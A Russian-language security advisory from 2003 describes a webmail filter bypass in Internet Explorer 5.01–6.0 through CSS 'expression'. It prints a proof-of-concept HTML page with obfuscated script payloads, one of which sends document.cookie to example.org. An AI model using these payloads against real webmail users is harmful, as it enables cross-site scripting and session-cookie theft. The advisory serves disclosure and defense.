Дата публикации: | 04.10.2003 |
Всего просмотров: | 1468 |
Опасность: | Высокая |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: Microsoft Internet Explorer 5.01-6.0 в комбинации с Web mail системами
Описание: Уязвимость обнаружена в некоторых Webmail системах в комбинации с Microsoft Internet Explorer. Удаленный атакующий может выполнить произвольный код сценария в почтовом HTML сообщении при его просмотре в Webmail системе, в обход существующих механизмов фильтрации. Удаленный атакующий может вставить произвольный javascript код в таблицу стилей через ключевое слово "expression" используя определенную методику, чтобы обойти существующие механизмы фильтрации javascript кода в большинстве Webmail системах. Уязвимость работает только в Microsoft Internet Explorer. Пример/Эксплоит: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr"> <head> <title>Webmail test</title> <meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1" /> </head> <body style="width:expres\sion(alert(1))"> <style type="text/css"> h1 { he\ight:e\xpression(alert(2)); bac\kground-image:e\xpression('url(http://example.org/'+document.cookie+$ } </style> <h1 style="width:expression(alert(3))">...</h1> <div id="just-for-fun"> <a href="javascript:window.open(document.location);" onmouseover="alert(4)">fireworks</a> </div> </body> </html> Решение: Не используйте IE для просмотра HTML почтовых сообщений в Web mail системах. |
|
Ссылки: | Webmails + Internet Explorer can create unwanted javascript execution |